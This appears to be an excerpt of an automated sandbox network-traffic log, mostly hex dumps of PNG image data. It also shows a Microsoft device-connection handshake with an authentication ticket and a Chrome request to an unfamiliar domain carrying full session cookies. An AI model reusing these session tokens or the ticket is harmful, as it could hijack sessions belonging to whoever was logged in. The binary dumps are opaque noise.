                                                        2024-07-03 19:07:27 UTC714INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                        Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6 e6 79 e0 e8 52 18 4e 2e ae 28 5c a4 28
                                                        Data Ascii: +bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7HeyRN.(\(
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30 a2 57 03 34 23 68 a2 d6 80 6a 04 b8 64
                                                        Data Ascii: .[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0W4#hjd
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b 57 a9 82 35 ab 57 f3 82 97 ec 6c be a4
                                                        Data Ascii: 1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+W5Wl
                                                        2024-07-03 19:07:27 UTC1369INData Raw: ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86 48 ce 42 27 e5 f2 b9 93 38 76 40 92 4d
                                                        Data Ascii: JS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB'8v@M
                                                        2024-07-03 19:07:27 UTC1369INData Raw: c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d 5b b6 e4 22 23 25 47 b6 e6 b1
                                                        Data Ascii: ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-["#%G
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7 b7 e9 9f 44 de 47 61 b7 a2 68
                                                        Data Ascii: zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?DGah
                                                        2024-07-03 19:07:27 UTC1369INData Raw: c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88 be c6 17 6d f6 cb 88 5e 9b e8
                                                        Data Ascii: jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}m^
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6 29 29 96 33 e1 92 80 6f e4 f6
                                                        Data Ascii: L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b))3o
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae ba 94 cb 88 5e 97 68 8b b3 2f
                                                        Data Ascii: FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<^h/


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.54982240.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 76 67 4a 77 2b 33 39 76 55 79 54 54 38 33 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 64 61 63 66 30 32 39 35 31 32 61 33 30 66 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: tvgJw+39vUyTT83k.1Context: c6dacf029512a30f
                                                        2024-07-03 19:07:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:07:26 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 74 76 67 4a 77 2b 33 39 76 55 79 54 54 38 33 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 64 61 63 66 30 32 39 35 31 32 61 33 30 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 77 5a 2b 79 69 74 69 2f 4c 51 49 39 4b 42 37 74 65 43 72 7a 45 50 45 6a 71 59 55 6c 74 79 4f 56 56 74 2b 45 6e 7a 4d 61 58 42 34 68 31 51 7a 6c 58 6b 54 72 57 71 41 63 5a 37 57 6e 6c 4f 56 6b 68 38 63 6c 57 72 56 6b 51 64 6c 2b 4f 45 2f 72 35 30 67 74 6b 68 58 6f 6d 46 53 38 4c 62 6d 45 6d 5a 64 75 62 34 5a 63 37 65 44 65
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: tvgJw+39vUyTT83k.2Context: c6dacf029512a30f<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdwZ+yiti/LQI9KB7teCrzEPEjqYUltyOVVt+EnzMaXB4h1QzlXkTrWqAcZ7WnlOVkh8clWrVkQdl+OE/r50gtkhXomFS8LbmEmZdub4Zc7eDe
                                                        2024-07-03 19:07:26 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 74 76 67 4a 77 2b 33 39 76 55 79 54 54 38 33 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 64 61 63 66 30 32 39 35 31 32 61 33 30 66 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: tvgJw+39vUyTT83k.3Context: c6dacf029512a30f
                                                        2024-07-03 19:07:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:07:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6b 6e 56 78 51 64 65 31 6a 55 69 31 4e 5a 2f 39 2f 33 51 57 65 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: knVxQde1jUi1NZ/9/3QWeA.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        91192.168.2.549825104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:26 UTC1144OUTGET /ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:27 UTC671INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:27 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 49602
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0s18O2zMb0zSBlSbVPn8qQOQM7YZWzBCl68R6kj0X7XQnIKAwaTry9qv0mARBWOQr3jiEql01StmTsbUdlUAkXX34dYyx03J8YR3uaNmwt5a%2Fehl4ewdQQS17I2W%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928943f9e7280-EWR
                                                        2024-07-03 19:07:27 UTC698INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                        Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 0a 7b 01 f8 3d 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49
                                                        Data Ascii: {=p-p=n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 24 49 92 24 49 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca
                                                        Data Ascii: $I$I$IgPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$
                                                        2024-07-03 19:07:27 UTC1369INData Raw: 57 03 af 5f ba c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49
                                                        Data Ascii: W_\@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I
